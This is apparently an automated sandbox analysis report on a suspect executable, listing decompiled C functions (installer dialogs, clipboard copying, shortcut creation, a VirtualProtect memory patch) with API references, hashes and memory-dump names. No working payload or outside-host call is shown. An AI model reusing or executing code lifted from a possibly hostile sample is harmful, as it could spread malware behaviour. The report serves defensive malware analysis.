Instruction Fuzzy Hash: FFE08C3220125AABEF119F60CC00AEB3B6CFB04361F004433FAA4E3140E230E9208BE4

Uniqueness

Uniqueness Score: -1.00%

Function 70482921, Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x70484038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x7048404c, 4, 0x40, 0x7048403c); // executed
					 *0x7048404c = 0xc2;
					 *0x7048403c = 0;
					 *0x70484044 = 0;
					 *0x70484058 = 0;
					 *0x70484048 = 0;
					 *0x70484040 = 0;
					 *0x70484050 = 0;
					 *0x7048404e = 0;
				}
				return 1;
			}

0x7048292a
0x7048292f
0x7048293f
0x70482947
0x7048294e
0x70482953
0x70482958
0x7048295d
0x70482962
0x70482967
0x7048296c
0x7048296c
0x70482974

APIs

VirtualProtect.KERNELBASE(7048404C,00000004,00000040,7048403C), ref: 7048293F

Memory Dump Source

Source File: 00000000.00000002.213483594.0000000070481000.00000020.00020000.sdmp, Offset: 70480000, based on PE: true

Associated: 00000000.00000002.213476460.0000000070480000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213490804.0000000070483000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213497394.0000000070485000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 96359c8f7d07821884575a230893f9837cf18e796c7fe01a20939cfac107e2bc
Instruction ID: ca5cedc3317930dc9e9910f856cee05c4acfb79cee8d1b2c507ba25b072fdc20
Opcode Fuzzy Hash: 96359c8f7d07821884575a230893f9837cf18e796c7fe01a20939cfac107e2bc
Instruction Fuzzy Hash: AFF028B3504240DEC350CF6A8C447073EE0A797359F224D7EE758D72E2E3B844449B12

Uniqueness

Uniqueness Score: -1.00%

Function 0040343E, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040343E(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x0040344c
0x00403452

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004054B2, Relevance: 54.3, APIs: 36, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E004054B2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42ec24; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405446, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E004062E0(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x42a8b8;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ec0c - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42f448, 8);
							__eflags =  *0x42f4ec - _t150;
							if( *0x42f4ec == _t150) {
								E00405374( *((intOrPtr*)( *0x42a090 + 0x34)), _t150);
							}
							E004042AA(1);
							goto L25;
						}
						 *0x429c88 = 2;
						E004042AA(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404338(_t157, _a12, _a16);
						}
						ShowWindow( *0x42ec10, _t150);
						ShowWindow(_v8, 8);
						E00404306(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42f454;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42ec10 = GetDlgItem(_a4, 0x403);
				 *0x42ec08 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42ec24 = _t128;
				_v8 = _t128;
				E00404306( *0x42ec10);
				 *0x42ec14 = E00404BF7(4);
				 *0x42ec2c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004042D1(_a4);
				if(( *0x42f45c & 0x00000003) != 0) {
					ShowWindow( *0x42ec10, _t150);
					if(( *0x42f45c & 0x00000002) != 0) {
						 *0x42ec10 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404306( *0x42ec08);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42f45c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}

0x004054b8
0x004054c0
0x004054c3
0x004054cb
0x004054ce
0x0040565d
0x00405663
0x00405687
0x00405687
0x00405693
0x00405699
0x004056bb
0x004056bb
0x004056c1
0x00405716
0x00405716
0x00405719
0x00000000
0x00000000
0x0040571b
0x0040571e
0x00405721
0x00000000
0x00000000
0x0040572b
0x00405731
0x00405733
0x00405736
0x00405833
0x00000000
0x00405833
0x00405745
0x00405751
0x0040575a
0x00405761
0x00405765
0x00405768
0x00405771
0x00405777
0x0040577a
0x0040577a
0x0040578a
0x00405790
0x00405793
0x0040579e
0x0040579e
0x0040579f
0x004057a2
0x004057a9
0x004057b0
0x004057b8
0x004057b8
0x004057c6
0x004057cc
0x004057cf
0x004057cf
0x004057d6
0x004057dc
0x004057e5
0x004057ec
0x004057f5
0x004057f7
0x004057fa
0x00405809
0x0040580b
0x0040580e
0x0040580f
0x00405812
0x00405813
0x00405814
0x00405814
0x0040581c
0x00405827
0x0040582d
0x0040582d
0x00000000
0x00405793
0x004056c3
0x004056c9
0x004056f7
0x004056f9
0x004056ff
0x0040570a
0x0040570a
0x00405711
0x00000000
0x00405711
0x004056cd
0x004056d7
0x00000000
0x0040569b
0x0040569b
0x004056a1
0x004056dc
0x00000000
0x004056e3
0x004056aa
0x004056b1
0x004056b6
0x00000000
0x004056b6
0x00405699
0x004054d4
0x004054d8
0x004054e0
0x004054e4
0x004054e7
0x004054ea
0x004054ed
0x004054f0
0x004054f1
0x004054f2
0x0040550b
0x0040550e
0x00405518
0x00405527
0x0040552f
0x00405537
0x0040553c
0x0040553f
0x0040554b
0x00405554
0x0040555d
0x0040557f
0x00405585
0x00405596
0x0040559b
0x004055a9
0x004055b7
0x004055b7
0x004055bc
0x004055ca
0x004055ca
0x004055cf
0x004055d2
0x004055d7
0x004055e3
0x004055ec
0x004055f9
0x00405608
0x004055fb
0x00405600
0x00405600
0x00405614
0x00405614
0x00405628
0x00405631
0x0040563a
0x0040564a
0x00405656
0x00405656
0x00000000

APIs

GetDlgItem.USER32 ref: 00405511
GetDlgItem.USER32 ref: 00405520
GetClientRect.USER32 ref: 0040555D
GetSystemMetrics.USER32 ref: 00405564
SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405585
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405596
SendMessageA.USER32(?,00001001,00000000,?), ref: 004055A9
SendMessageA.USER32(?,00001026,00000000,?), ref: 004055B7
SendMessageA.USER32(?,00001024,00000000,?), ref: 004055CA
ShowWindow.USER32(00000000,?,0000001B,?), ref: 004055EC
ShowWindow.USER32(?,00000008), ref: 00405600
GetDlgItem.USER32 ref: 00405621
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405631
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040564A
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405656
GetDlgItem.USER32 ref: 0040552F

Part of subcall function 00404306: SendMessageA.USER32(00000028,?,00000001,00404136), ref: 00404314

GetDlgItem.USER32 ref: 00405672
CreateThread.KERNEL32 ref: 00405680
CloseHandle.KERNEL32(00000000), ref: 00405687
ShowWindow.USER32(00000000), ref: 004056AA
ShowWindow.USER32(?,00000008), ref: 004056B1
ShowWindow.USER32(00000008), ref: 004056F7
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040572B
CreatePopupMenu.USER32 ref: 0040573C
AppendMenuA.USER32 ref: 00405751
GetWindowRect.USER32 ref: 00405771
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578A
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004057C6
OpenClipboard.USER32(00000000), ref: 004057D6
EmptyClipboard.USER32 ref: 004057DC
GlobalAlloc.KERNEL32(00000042,?), ref: 004057E5
GlobalLock.KERNEL32 ref: 004057EF
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405803
GlobalUnlock.KERNEL32(00000000), ref: 0040581C
SetClipboardData.USER32 ref: 00405827
CloseClipboard.USER32 ref: 0040582D

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
Instruction ID: 3d94e6139f86797c0ae92d92c46aaabaef2c33f238587a010477577dd15b8479
Opcode Fuzzy Hash: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
Instruction Fuzzy Hash: 1BA17C71900608BFDB11AFA1DE45EAE3B79FB08354F40443AFA45B61A0CB754E51DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00404763, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404763(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42a090;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040594D(0x3fb, _t146);
					E00406528(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040594D(0x3fb, _t146);
							if(E00405CD3(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E0040624D(0x429888, _t146);
							_t87 = E00406656(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040624D(0x429888, _t146);
								_t89 = E00405C7E(0x429888);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429888,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429888) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429888,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405C2C(0x429888);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429888) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404BF7(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42ec1c; // 0x82c3c2
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404BDF(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429878);
									} else {
										E00404B1A(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42f504 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E004042F3(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a8a8 == _t158) {
									E004046BC();
								}
								 *0x42a8a8 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a8b8;
							_v60 = E00404AB4;
							_v56 = _t146;
							_v68 = E004062E0(_t146, 0x42a8b8, _t166, 0x429c90, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405BE5(_t146);
								_t125 =  *((intOrPtr*)( *0x42f454 + 0x11c));
								if( *((intOrPtr*)( *0x42f454 + 0x11c)) != 0 && _t146 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E004062E0(_t146, 0x42a8b8, _t166, 0, _t125);
									if(lstrcmpiA(0x42e3e0, 0x42a8b8) != 0) {
										lstrcatA(_t146, 0x42e3e0);
									}
								}
								 *0x42a8a8 =  *0x42a8a8 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405C52(_t146) != 0 && E00405C7E(_t146) == 0) {
						E00405BE5(_t146);
					}
					 *0x42ec18 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004042D1(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004042D1(_t166);
					E00404306(_t165);
					_t138 = E00406656(8);
					if(_t138 == 0) {
						L53:
						return E00404338(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}

0x00404763
0x00404769
0x0040476f
0x0040477c
0x0040478a
0x0040478d
0x00404795
0x0040479b
0x0040479b
0x004047a7
0x004047aa
0x00404818
0x0040481f
0x004048f6
0x004048fd
0x0040490c
0x0040490c
0x00404910
0x0040491a
0x00404927
0x00404929
0x00404929
0x00404937
0x0040493e
0x00404945
0x00404948
0x0040497f
0x00404981
0x00404987
0x0040498c
0x00404990
0x00404992
0x00404992
0x004049ae
0x00000000
0x004049b0
0x004049b3
0x004049c1
0x004049c7
0x004049c8
0x004049cb
0x004049ce
0x00000000
0x004049ce
0x0040494a
0x0040494c
0x00404950
0x00000000
0x00000000
0x00000000
0x00000000
0x00404952
0x00404952
0x0040495f
0x00404964
0x00000000
0x00000000
0x00404968
0x0040496a
0x0040496a
0x00404972
0x00404974
0x00404977
0x0040497a
0x0040497d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040497d
0x004049da
0x004049e4
0x004049e7
0x004049ea
0x004049f1
0x004049f1
0x004049f3
0x004049f3
0x004049f8
0x004049fa
0x00404a02
0x00404a09
0x00404a0b
0x00404a16
0x00404a16
0x00404a0b
0x00404a1d
0x00404a26
0x00404a30
0x00404a38
0x00404a53
0x00404a3a
0x00404a43
0x00404a43
0x00404a38
0x00404a58
0x00404a5d
0x00404a62
0x00404a6b
0x00404a6b
0x00404a74
0x00404a76
0x00404a76
0x00404a82
0x00404a8a
0x00404a94
0x00404a94
0x00404a99
0x00000000
0x00404a99
0x00404948
0x004048ff
0x00404906
0x00000000
0x00000000
0x00000000
0x00404906
0x00404825
0x0040482e
0x00404848
0x0040484d
0x00404857
0x0040485e
0x0040486a
0x0040486d
0x00404870
0x00404877
0x0040487f
0x00404882
0x00404886
0x0040488d
0x00404895
0x004048ef
0x00404897
0x00404898
0x0040489f
0x004048a9
0x004048b1
0x004048be
0x004048d2
0x004048d6
0x004048d6
0x004048d2
0x004048db
0x004048e8
0x004048e8
0x00404895
0x00000000
0x0040484d
0x0040483b
0x00000000
0x00000000
0x00404841
0x00000000
0x004047ac
0x004047b9
0x004047c2
0x004047cf
0x004047cf
0x004047d6
0x004047dc
0x004047e5
0x004047e8
0x004047eb
0x004047f3
0x004047f6
0x004047f9
0x004047ff
0x00404806
0x0040480d
0x00404a9f
0x00404ab1
0x00404813
0x00404816
0x00000000
0x00404816
0x0040480d

APIs

GetDlgItem.USER32 ref: 004047B2
SetWindowTextA.USER32(00000000,?), ref: 004047DC
SHBrowseForFolderA.SHELL32(?,00429C90,?), ref: 0040488D
CoTaskMemFree.OLE32(00000000), ref: 00404898
lstrcmpiA.KERNEL32(Call,0042A8B8,00000000,?,?), ref: 004048CA
lstrcatA.KERNEL32(?,Call), ref: 004048D6
SetDlgItemTextA.USER32 ref: 004048E8

Part of subcall function 0040594D: GetDlgItemTextA.USER32 ref: 00405960

Part of subcall function 00406528: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\lpdKSOB78u.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406580
Part of subcall function 00406528: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040658D
Part of subcall function 00406528: CharNextA.USER32(?,"C:\Users\user\Desktop\lpdKSOB78u.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406592
Part of subcall function 00406528: CharPrevA.USER32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004065A2

GetDiskFreeSpaceA.KERNEL32(00429888,?,?,0000040F,?,00429888,00429888,?,00000001,00429888,?,?,000003FB,?), ref: 004049A6
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049C1

Part of subcall function 00404B1A: lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
Part of subcall function 00404B1A: wsprintfA.USER32 ref: 00404BC0
Part of subcall function 00404B1A: SetDlgItemTextA.USER32 ref: 00404BD3

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 004048B3
Call, xrefs: 004048C4, 004048C9, 004048D4
A, xrefs: 00404886

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp$Call
API String ID: 2624150263-2678639445
Opcode ID: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
Instruction ID: b89c9f0b9ad2a5e463b1d4baa2297f7fe0657747611b748bc5d4715ca5df860c
Opcode Fuzzy Hash: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
Instruction Fuzzy Hash: A9A17DB1A00209ABDB11AFA5C941AAF77B8EF84314F14843BF601B62D1DB7C99518F6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040216B(void* __eflags) {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405C52( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\hardz\\AppData\\Local\\Temp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
